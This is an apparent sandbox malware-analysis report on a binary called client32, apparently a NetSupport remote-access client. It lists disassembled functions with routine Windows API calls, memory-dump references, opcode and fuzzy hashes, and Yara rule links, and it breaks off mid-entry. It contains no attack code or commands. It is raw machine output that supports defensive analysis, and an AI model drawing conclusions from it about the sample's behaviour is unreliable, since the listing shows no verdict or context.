                                                                                                                                    Function 11160450 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetPropA.USER32 ref: 1116046E
                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LongPropWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2492497586-0
                                                                                                                                    • Opcode ID: c21c60cc47c8b8f98d029afb4ec14b55cd060e124069d68dfb3cc30e1ab93e6f
                                                                                                                                    • Instruction ID: 1c745b1653fd3e8b3091c37bbb53d0f4b243916ecd5e1758ad18f1d63e851998
                                                                                                                                    • Opcode Fuzzy Hash: c21c60cc47c8b8f98d029afb4ec14b55cd060e124069d68dfb3cc30e1ab93e6f
                                                                                                                                    • Instruction Fuzzy Hash: 24018C762003259BD3308F5AE844FA7FBFCEB91335F00862AF57582A80C3B9A451DB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 11143091
                                                                                                                                    • SetRect.USER32 ref: 111430A9
                                                                                                                                    • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$RectText
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4034337308-0
                                                                                                                                    • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                                                                    • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                                                                                    • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                                                                    • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116C5FC Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(?,?,1116A1B4,11163A9A,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 1116C600
                                                                                                                                      • Part of subcall function 1116C4BA: TlsGetValue.KERNEL32(?,1116C613,?,1111023E,?,?,?,?,11145C02,?,?,?,?,?,11146AA3,?), ref: 1116C4C3
                                                                                                                                      • Part of subcall function 1116C4BA: RtlDecodePointer.NTDLL(?,1111023E,?,?,?,?,11145C02,?,?,?,?,?,11146AA3,?,1103179F), ref: 1116C4D5
                                                                                                                                      • Part of subcall function 1116C4BA: TlsSetValue.KERNEL32(00000000,?,1111023E,?,?,?,?,11145C02,?,?,?,?,?,11146AA3,?,1103179F), ref: 1116C4E4
                                                                                                                                    • SetLastError.KERNEL32(00000000,?,1111023E,?,?,?,?,11145C02,?,?,?,?,?,11146AA3,?,1103179F), ref: 1116C66A
                                                                                                                                      • Part of subcall function 1116AC7E: Sleep.KERNEL32(00000000,1103179F,?,00000000), ref: 1116ACA6
                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,1111023E,?,?,?,?,11145C02,?,?,?,?,?,11146AA3,?,1103179F), ref: 1116C63C
                                                                                                                                      • Part of subcall function 1116C548: GetModuleHandleW.KERNEL32(KERNEL32.DLL,111DD208,00000008,1116C650,00000000,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 1116C559
                                                                                                                                      • Part of subcall function 1116C548: InterlockedIncrement.KERNEL32(111ECF10), ref: 1116C59A
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1116C652
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DecodeErrorLastPointerValue$CurrentHandleIncrementInterlockedModuleSleepThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 68510339-0
                                                                                                                                    • Opcode ID: c252e92e8746be3caab215ba3e6c340bf542f7da175d6971bc3accfb60ef5ef5
                                                                                                                                    • Instruction ID: 7eca95c4be1980d840f4ab15b738908860ee0cdf9d113032137bb14927411621
                                                                                                                                    • Opcode Fuzzy Hash: c252e92e8746be3caab215ba3e6c340bf542f7da175d6971bc3accfb60ef5ef5
                                                                                                                                    • Instruction Fuzzy Hash: 9CF044339452369BE2262BF5AD48B5AFE58AF41F7CB110125F830D2184CF62A811C7DD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111103D0 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 111103DE
                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,762D8BD0,00000000,111F1590,?,110CD955,00000000,762D8BD0), ref: 111103E8
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,762EA6D0,00000000,?,110CD955,00000000,762D8BD0), ref: 11110408
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,762EA6D0,00000000,?,110CD955,00000000,762D8BD0), ref: 1111041C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2905768538-0
                                                                                                                                    • Opcode ID: 8fd22b812c8f62b715523e5f86df3aaa2cd2768748401e5e8898e20f481cbd2c
                                                                                                                                    • Instruction ID: 4c724308613bea48e6bb16f63c046e4f2304003fe7903f8ffd3459ebd8414c8e
                                                                                                                                    • Opcode Fuzzy Hash: 8fd22b812c8f62b715523e5f86df3aaa2cd2768748401e5e8898e20f481cbd2c
                                                                                                                                    • Instruction Fuzzy Hash: 73F0623665112CEFD305DFA5D9849AEB7A8FB99316B10417AF925C7900E630A905CBF0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116C7BE Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • TlsGetValue.KERNEL32(?,?,1116A4CB,00000000,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C7DF
                                                                                                                                    • TlsGetValue.KERNEL32(?,?,1116A4CB,00000000,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C7F1
                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,1116A4CB,00000000,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C807
                                                                                                                                    • TlsSetValue.KERNEL32(00000026,00000000,?,1116A4CB,00000000,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C824
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Value$DecodePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 721062344-0
                                                                                                                                    • Opcode ID: cbdb16a4a826ccac8d86a1381bfcebdc675c744d09cb323ff5aa70a74ec25c2d
                                                                                                                                    • Instruction ID: 41ea034e3bfca3d248251c887851e32f7c5582573dde1938c0ea71f0027a96f2
                                                                                                                                    • Opcode Fuzzy Hash: cbdb16a4a826ccac8d86a1381bfcebdc675c744d09cb323ff5aa70a74ec25c2d
                                                                                                                                    • Instruction Fuzzy Hash: D5F04F30801229EADB129FE4CEC4B65BE69EB00B69F104134F838524A4CB716971CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1115F1F0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GlobalDeleteAtom.KERNEL32 ref: 1115F208
                                                                                                                                    • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                                                                                    • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AtomDeleteGlobal$LongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 964255742-0
                                                                                                                                    • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                                                    • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                                                                                    • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                                                    • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11007255 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                    • CreateWindowExA.USER32 ref: 110073A7
                                                                                                                                    • SetFocus.USER32(?), ref: 11007403
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFocusWindowwsprintf
                                                                                                                                    • String ID: edit
                                                                                                                                    • API String ID: 4214736919-2167791130
                                                                                                                                    • Opcode ID: 077d2b62e82444515352fe3741f9793d0907ebfc6130ee01638f44e30bc11e21
                                                                                                                                    • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                                                                                    • Opcode Fuzzy Hash: 077d2b62e82444515352fe3741f9793d0907ebfc6130ee01638f44e30bc11e21
                                                                                                                                    • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110BE7B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11076AD0: GlobalAddAtomA.KERNEL32 ref: 11076B25
                                                                                                                                      • Part of subcall function 11076AD0: GetSysColor.USER32(0000000F), ref: 11076B43
                                                                                                                                      • Part of subcall function 11076AD0: GetSysColor.USER32(00000014), ref: 11076B4A
                                                                                                                                      • Part of subcall function 11076AD0: GetSysColor.USER32(00000010), ref: 11076B51
                                                                                                                                      • Part of subcall function 11076AD0: GetSysColor.USER32(00000008), ref: 11076B58
                                                                                                                                      • Part of subcall function 11076AD0: GetSysColor.USER32(00000016), ref: 11076B5F
                                                                                                                                      • Part of subcall function 110AF950: InitializeCriticalSection.KERNEL32(00000154,00000000,110BE882,?,1105E75F,20F29797,00000000,00000000,00000000,00000000,00000000,111861F4,000000FF,?,1105E75F,?), ref: 110AF961
                                                                                                                                      • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                                                                      • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                                                                      • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                                                                      • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                                                                      • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 110BE912
                                                                                                                                      • Part of subcall function 110CB5E0: InterlockedIncrement.KERNEL32(111E7E04), ref: 110CB5E8
                                                                                                                                      • Part of subcall function 110CB5E0: CoInitialize.OLE32(00000000), ref: 110CB60C
                                                                                                                                    • GlobalAddAtomA.KERNEL32 ref: 110BE965
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ColorInitialize$CriticalSection$AtomGlobal$CreateCurrentEnterEventIncrementInterlockedThread
                                                                                                                                    • String ID: NSMCobrowse
                                                                                                                                    • API String ID: 2361268844-2243205248
                                                                                                                                    • Opcode ID: 63d4a60f97ddd0421453617f656fae3a1a557c814b276902a07d6d35068d640f
                                                                                                                                    • Instruction ID: d81fe5e1ff4d422df755911d2566dfb4837a27991cff78c4bfeb0538aa2f6b61
                                                                                                                                    • Opcode Fuzzy Hash: 63d4a60f97ddd0421453617f656fae3a1a557c814b276902a07d6d35068d640f
                                                                                                                                    • Instruction Fuzzy Hash: 58516978904785DFD721CFA9C58479AFBE4FF19308F50886ED4AA83641DB747608CB21
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110ED7B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,762D8890), ref: 110ED801
                                                                                                                                    • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED85A
                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: QueryValue$ErrorFreeHeapLast
